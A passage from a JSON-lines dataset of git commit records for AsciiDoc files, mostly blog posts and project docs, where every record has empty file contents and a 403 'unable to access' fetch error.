'_posts\/2017-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc","new_file":"_posts\/2017-12-01-Software-Developers-Guide-to-Working-in-Open-Floor-Plan-Office.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"754ff3d889947d87262e97afdcff621686a9e5e1","subject":"Create Tutorials.adoc","message":"Create Tutorials.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/Tutorials.adoc","new_file":"wiki\/Tutorials.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fca1fc846efde984144cddf246a725ffc8606a8","subject":"Update 2016-03-20-Bug.adoc","message":"Update 2016-03-20-Bug.adoc","repos":"indusbox\/indusbox.github.io,indusbox\/indusbox.github.io,indusbox\/indusbox.github.io,indusbox\/indusbox.github.io","old_file":"_posts\/2016-03-20-Bug.adoc","new_file":"_posts\/2016-03-20-Bug.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/indusbox\/indusbox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55ca107f2d003c4333f26a7988c6786ac16e3dbb","subject":"CAMEL-13792 - Rename components to default names, Camel-rxjava2 to camel-rxjava - Regen","message":"CAMEL-13792 - Rename components to default names, Camel-rxjava2 to camel-rxjava - Regen\n","repos":"tdiesler\/camel,zregvart\/camel,adessaigne\/camel,zregvart\/camel,tdiesler\/camel,tdiesler\/camel,tdiesler\/camel,mcollovati\/camel,pmoerenhout\/camel,pax95\/camel,adessaigne\/camel,gnodet\/camel,alvinkwekel\/camel,adessaigne\/camel,adessaigne\/camel,objectiser\/camel,DariusX\/camel,gnodet\/camel,ullgren\/camel,christophd\/camel,tdiesler\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,cunningt\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,tadayosi\/camel,pax95\/camel,tadayosi\/camel,mcollovati\/camel,pmoerenhout\/camel,mcollovati\/camel,DariusX\/camel,ullgren\/camel,christophd\/camel,zregvart\/camel,tadayosi\/camel,mcollovati\/camel,christophd\/camel,objectiser\/camel,alvinkwekel\/camel,nicolaferraro\/camel,pmoerenhout\/camel,DariusX\/camel,pax95\/camel,nicolaferraro\/camel,christophd\/camel,cunningt\/camel,CodeSmell\/camel,christophd\/camel,nikhilvibhav\/camel,apache\/camel,cunningt\/camel,pax95\/camel,CodeSmell\/camel,CodeSmell\/camel,nicolaferraro\/camel,ullgren\/camel,adessaigne\/camel,zregvart\/camel,apache\/camel,gnodet\/camel,pax95\/camel,CodeSmell\/camel,DariusX\/camel,ullgren\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,apache\/camel,objectiser\/camel,adessaigne\/camel,tdiesler\/camel,apache\/camel,tadayosi\/camel,apache\/camel,gnodet\/camel,cunningt\/camel,pmoerenhout\/camel,gnodet\/camel,alvinkwekel\/camel,nicolaferraro\/camel,christophd\/camel,apache\/camel,objectiser\/camel,tadayosi\/camel,pmoerenhout\/camel,cunningt\/camel,nikhilvibhav\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/rxjava.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/rxjava.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b07b31f7777c5d146c94efaeadc5c12377c64317","subject":"Update 2017-02-14-Test-post.adoc","message":"Update 2017-02-14-Test-post.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-02-14-Test-post.adoc","new_file":"_posts\/2017-02-14-Test-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"330c20a733896bcacf421541fe72f26bb29998f5","subject":"Update 2017-05-16-IDE-IDE-2.adoc","message":"Update 2017-05-16-IDE-IDE-2.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-16-IDE-IDE-2.adoc","new_file":"_posts\/2017-05-16-IDE-IDE-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e301aa7b0b5d8ddac15512acbe2c53a089b93e9e","subject":"Update 2015-06-09-Hola-EdMundo.adoc","message":"Update 2015-06-09-Hola-EdMundo.adoc","repos":"nectia-think\/nectia-think.github.io,nectia-think\/nectia-think.github.io,nectia-think\/nectia-think.github.io","old_file":"_posts\/2015-06-09-Hola-EdMundo.adoc","new_file":"_posts\/2015-06-09-Hola-EdMundo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nectia-think\/nectia-think.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97bd4534819f3af5668efebd6ac3ffea9e9f5d4b","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8d370d24e08364c6c603302e800cd4372e1354a","subject":"Deleted 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Deleted 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c17b27c43a3de6ceb8b07618cd89136f9d6e8ac7","subject":"Add a post spotlighting continuous build","message":"Add a post spotlighting continuous build\n","repos":"raelik\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,jamescway\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,jamescway\/jruby-gradle-plugin,raelik\/jruby-gradle-plugin,jamescway\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,raelik\/jruby-gradle-plugin","old_file":"docs\/news\/2015-09-01-using-newer-gradle-features.adoc","new_file":"docs\/news\/2015-09-01-using-newer-gradle-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raelik\/jruby-gradle-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d3da0f48696969c0293671275f2aca1918b2ca5","subject":"Add skeleton for secrets doc","message":"Add skeleton for secrets doc\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"dev_guide\/secrets.adoc","new_file":"dev_guide\/secrets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9699febf9701bfe1b9fc64957a492c342a656173","subject":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","message":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"305131ff1b3e1350d4a2567c47e8ff41d74f51e9","subject":"some minimal CliBuilder doco","message":"some minimal CliBuilder doco\n","repos":"shils\/incubator-groovy,armsargis\/groovy,paulk-asert\/groovy,apache\/groovy,graemerocher\/incubator-groovy,dpolivaev\/groovy,jwagenleitner\/groovy,armsargis\/groovy,graemerocher\/incubator-groovy,bsideup\/incubator-groovy,shils\/incubator-groovy,paulk-asert\/incubator-groovy,jwagenleitner\/groovy,apache\/incubator-groovy,dpolivaev\/groovy,tkruse\/incubator-groovy,paulk-asert\/incubator-groovy,jwagenleitner\/incubator-groovy,alien11689\/incubator-groovy,paulk-asert\/groovy,shils\/groovy,avafanasiev\/groovy,shils\/groovy,alien11689\/incubator-groovy,jwagenleitner\/incubator-groovy,russel\/groovy,apache\/groovy,russel\/groovy,russel\/groovy,shils\/incubator-groovy,russel\/incubator-groovy,tkruse\/incubator-groovy,dpolivaev\/groovy,paulk-asert\/groovy,avafanasiev\/groovy,avafanasiev\/groovy,armsargis\/groovy,tkruse\/incubator-groovy,armsargis\/groovy,jwagenleitner\/incubator-groovy,shils\/groovy,graemerocher\/incubator-groovy,bsideup\/incubator-groovy,graemerocher\/incubator-groovy,fpavageau\/groovy,traneHead\/groovy-core,alien11689\/incubator-groovy,dpolivaev\/groovy,russel\/groovy,apache\/groovy,shils\/groovy,apache\/incubator-groovy,jwagenleitner\/groovy,apache\/incubator-groovy,fpavageau\/groovy,paulk-asert\/incubator-groovy,paulk-asert\/groovy,fpavageau\/groovy,bsideup\/incubator-groovy,russel\/incubator-groovy,apache\/incubator-groovy,apache\/groovy,tkruse\/incubator-groovy,bsideup\/incubator-groovy,shils\/incubator-groovy,paulk-asert\/incubator-groovy,jwagenleitner\/incubator-groovy,traneHead\/groovy-core,alien11689\/incubator-groovy,traneHead\/groovy-core,russel\/incubator-groovy,russel\/incubator-groovy,traneHead\/groovy-core,avafanasiev\/groovy,paulk-asert\/incubator-groovy,fpavageau\/groovy,jwagenleitner\/groovy","old_file":"src\/spec\/doc\/core-domain-specific-languages.adoc","new_file":"src\/spec\/doc\/core-domain-specific-languages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/armsargis\/groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7278e8e3d1a11274df4d498a7b771f4b67da4253","subject":"Create do-always-respond-es.adoc","message":"Create do-always-respond-es.adoc\n\nSpanish translation for do-always-respond.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-always-respond-es.adoc","new_file":"src\/do\/do-always-respond-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf4c23b200a20e42702bedefa35aae2a4dcec493","subject":"Update 2015-02-17-HubPress-Das-eigene-kostenfreie-Blog-uber-GitHub.adoc","message":"Update 2015-02-17-HubPress-Das-eigene-kostenfreie-Blog-uber-GitHub.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-17-HubPress-Das-eigene-kostenfreie-Blog-uber-GitHub.adoc","new_file":"_posts\/2015-02-17-HubPress-Das-eigene-kostenfreie-Blog-uber-GitHub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"983fdb9082ad694a5f5d7295bc24f7f03fbde047","subject":"Add common-gradle snippet","message":"Add common-gradle snippet","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-gradle.adoc","new_file":"src\/main\/docs\/common-gradle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68aa0b6d969ab5caf7e727e35524dc25e1c16397","subject":"Update 2014-09-16-Disqus-comments-with-Frog.adoc","message":"Update 2014-09-16-Disqus-comments-with-Frog.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-16-Disqus-comments-with-Frog.adoc","new_file":"_posts\/2014-09-16-Disqus-comments-with-Frog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae9ba3560f405e82cab76edef0f5041a610cd99e","subject":"Adding a new test document","message":"Adding a new test document\n","repos":"NicolasGeraud\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin,asciidoctor\/asciidoctor-maven-plugin,mojavelinux\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin,asciidoctor\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin,asciidoctor\/asciidoctor-maven-plugin","old_file":"src\/test\/resources\/src\/asciidoctor\/sample-embedded.adoc","new_file":"src\/test\/resources\/src\/asciidoctor\/sample-embedded.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mojavelinux\/asciidoctor-maven-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"676838c99c359e45ce0f9f3014eb68a75e7121e1","subject":"Update 2016-6-25-Git-one.adoc","message":"Update 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-25-Git-one.adoc","new_file":"_posts\/2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3abe06819e27f43d16f1e65403c3ba0bbd800468","subject":"Update 2015-12-14-Treat-your-POM-the-same-as-your-java-code.adoc","message":"Update 2015-12-14-Treat-your-POM-the-same-as-your-java-code.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-12-14-Treat-your-POM-the-same-as-your-java-code.adoc","new_file":"_posts\/2015-12-14-Treat-your-POM-the-same-as-your-java-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0b9214f7964e2d5a97b9034f9426123d144655a","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af125af01b14a5a8d052d2edbf7a5ae6f61f4e50","subject":"Delete 2015-06-08-My-title2.adoc","message":"Delete 2015-06-08-My-title2.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-08-My-title2.adoc","new_file":"_posts\/2015-06-08-My-title2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"151d01f734a21f7f53772115e26fef4ba86c2b27","subject":"Update 2016-12-02-Ruby-Tips.adoc","message":"Update 2016-12-02-Ruby-Tips.adoc","repos":"railsdev\/railsdev.github.io,railsdev\/railsdev.github.io,railsdev\/railsdev.github.io,railsdev\/railsdev.github.io","old_file":"_posts\/2016-12-02-Ruby-Tips.adoc","new_file":"_posts\/2016-12-02-Ruby-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/railsdev\/railsdev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fefe752a0f0df3dbb61aad0327689ed54a62552","subject":"Update 2018-08-30-Exception.adoc","message":"Update 2018-08-30-Exception.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-Exception.adoc","new_file":"_posts\/2018-08-30-Exception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b3ada08b4da47c8a30232ff77ee67cd599d95ec","subject":"Create payment-control-plugins.adoc","message":"Create payment-control-plugins.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/payment\/includes\/payment-control-plugins.adoc","new_file":"userguide\/payment\/includes\/payment-control-plugins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cc4be348a81d79fb22de2cfb254d279abfd2c5c4","subject":"Added Set Header EIP to docs","message":"Added Set Header EIP to docs\n","repos":"kevinearls\/camel,Fabryprog\/camel,apache\/camel,zregvart\/camel,tdiesler\/camel,punkhorn\/camel-upstream,adessaigne\/camel,curso007\/camel,tdiesler\/camel,nicolaferraro\/camel,tdiesler\/camel,gnodet\/camel,anoordover\/camel,snurmine\/camel,jamesnetherton\/camel,cunningt\/camel,onders86\/camel,objectiser\/camel,onders86\/camel,kevinearls\/camel,dmvolod\/camel,DariusX\/camel,jonmcewen\/camel,pmoerenhout\/camel,adessaigne\/camel,mcollovati\/camel,pmoerenhout\/camel,DariusX\/camel,dmvolod\/camel,jonmcewen\/camel,CodeSmell\/camel,gnodet\/camel,mcollovati\/camel,alvinkwekel\/camel,dmvolod\/camel,akhettar\/camel,kevinearls\/camel,apache\/camel,jonmcewen\/camel,ullgren\/camel,Fabryprog\/camel,tdiesler\/camel,pax95\/camel,curso007\/camel,Fabryprog\/camel,tadayosi\/camel,snurmine\/camel,alvinkwekel\/camel,sverkera\/camel,dmvolod\/camel,gautric\/camel,adessaigne\/camel,dmvolod\/camel,sverkera\/camel,mcollovati\/camel,onders86\/camel,CodeSmell\/camel,curso007\/camel,jamesnetherton\/camel,apache\/camel,sverkera\/camel,jonmcewen\/camel,cunningt\/camel,anoordover\/camel,zregvart\/camel,adessaigne\/camel,mcollovati\/camel,pax95\/camel,snurmine\/camel,jonmcewen\/camel,akhettar\/camel,davidkarlsen\/camel,onders86\/camel,davidkarlsen\/camel,pmoerenhout\/camel,anoordover\/camel,objectiser\/camel,curso007\/camel,christophd\/camel,alvinkwekel\/camel,tadayosi\/camel,curso007\/camel,christophd\/camel,DariusX\/camel,christophd\/camel,snurmine\/camel,kevinearls\/camel,anoordover\/camel,zregvart\/camel,gautric\/camel,snurmine\/camel,tdiesler\/camel,adessaigne\/camel,cunningt\/camel,snurmine\/camel,CodeSmell\/camel,anoordover\/camel,kevinearls\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,tadayosi\/camel,christophd\/camel,apache\/camel,cunningt\/camel,jonmcewen\/camel,apache\/camel,gautric\/camel,pmoerenhout\/camel,Fabryprog\/camel,christophd\/camel,pax95\/camel,objectiser\/camel,ullgren\/camel,tadayosi\/camel,sverkera\/camel,akhettar\/camel,nikhilvibhav\/camel,cunningt\/camel,christophd\/camel,pax95\/camel,gnodet\/camel,anoordover\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,DariusX\/camel,davidkarlsen\/camel,apache\/camel,ullgren\/camel,tadayosi\/camel,pmoerenhout\/camel,zregvart\/camel,adessaigne\/camel,curso007\/camel,tadayosi\/camel,objectiser\/camel,sverkera\/camel,CodeSmell\/camel,akhettar\/camel,punkhorn\/camel-upstream,gautric\/camel,jamesnetherton\/camel,pax95\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,akhettar\/camel,akhettar\/camel,sverkera\/camel,gautric\/camel,gnodet\/camel,gnodet\/camel,cunningt\/camel,tdiesler\/camel,gautric\/camel,alvinkwekel\/camel,davidkarlsen\/camel,pax95\/camel,jamesnetherton\/camel,onders86\/camel,jamesnetherton\/camel,onders86\/camel,pmoerenhout\/camel,ullgren\/camel,jamesnetherton\/camel,kevinearls\/camel,nicolaferraro\/camel,dmvolod\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/setHeader-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/setHeader-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c97f34a2180fd27d95a010566d415cd98003d78d","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25876f386dd86a8eebe5ebfa50976ad7a3662f64","subject":"Update 2015-05-12-Hi-all.adoc","message":"Update 2015-05-12-Hi-all.adoc","repos":"envyen\/blog,envyen\/blog,envyen\/blog","old_file":"_posts\/2015-05-12-Hi-all.adoc","new_file":"_posts\/2015-05-12-Hi-all.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/envyen\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c0f3e84da5f2f4c966fdca4f86a051c5a370256","subject":"Update 2015-08-20-sample.adoc","message":"Update 2015-08-20-sample.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-08-20-sample.adoc","new_file":"_posts\/2015-08-20-sample.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71b3ada08a6ba4cd55483968719f7621fea137db","subject":"Update 2016-03-29-Python.adoc","message":"Update 2016-03-29-Python.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Python.adoc","new_file":"_posts\/2016-03-29-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5bbe5296e79a2d2111b5391471119680645201dd","subject":"add first iteration of docs","message":"add first iteration of docs\n","repos":"beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy","old_file":"docs\/Idea.adoc","new_file":"docs\/Idea.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beavyHQ\/beavy.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"931210608f941ec6b7ba6bfb55edd0cb0188ea4d","subject":"update NOTES.adoc","message":"update NOTES.adoc\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbee3392638def595b423db683646b742fa97a70","subject":"added js howto documentation based on DolphinJumpStart js sample","message":"added js howto documentation based on DolphinJumpStart js sample\n","repos":"canoo\/open-dolphin,janih\/open-dolphin,janih\/open-dolphin,canoo\/open-dolphin,canoo\/open-dolphin,janih\/open-dolphin,canoo\/open-dolphin,janih\/open-dolphin","old_file":"subprojects\/documentation\/src\/docs\/asciidoc\/guide\/howtoWeb\/howtoStep4.adoc","new_file":"subprojects\/documentation\/src\/docs\/asciidoc\/guide\/howtoWeb\/howtoStep4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/janih\/open-dolphin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5547edc0cfa96719eb90a9b284fc50ef1b96e5cd","subject":"\u2026 including BP","message":"\u2026 including BP\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Best practices.adoc","new_file":"Git\/Best practices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00d31cc3b9475582a4d4fd8cc0d47d7f6e11bc90","subject":"Update 2017-01-20-notification-Google-Apps-Script.adoc","message":"Update 2017-01-20-notification-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-notification-Google-Apps-Script.adoc","new_file":"_posts\/2017-01-20-notification-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc28c5d8bdf9821687933dbc25502d173149e08f","subject":"Renamed '_posts\/2017-01-15-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc' to '_posts\/2017-01-15-Draft-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc'","message":"Renamed '_posts\/2017-01-15-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc' to '_posts\/2017-01-15-Draft-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc'","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2017-01-15-Draft-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc","new_file":"_posts\/2017-01-15-Draft-Designing-user-friendly-method-arguments-for-high-performance-MATLAB-AP-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76dd4839548eb9e07d58f470c0f62be6aa68f240","subject":"Update 2015-05-05-First-Post.adoc","message":"Update 2015-05-05-First-Post.adoc","repos":"bartoleo\/bartoleo.github.io,bartoleo\/bartoleo.github.io,bartoleo\/bartoleo.github.io","old_file":"_posts\/2015-05-05-First-Post.adoc","new_file":"_posts\/2015-05-05-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bartoleo\/bartoleo.github.io.git\/': The requested URL returned error: 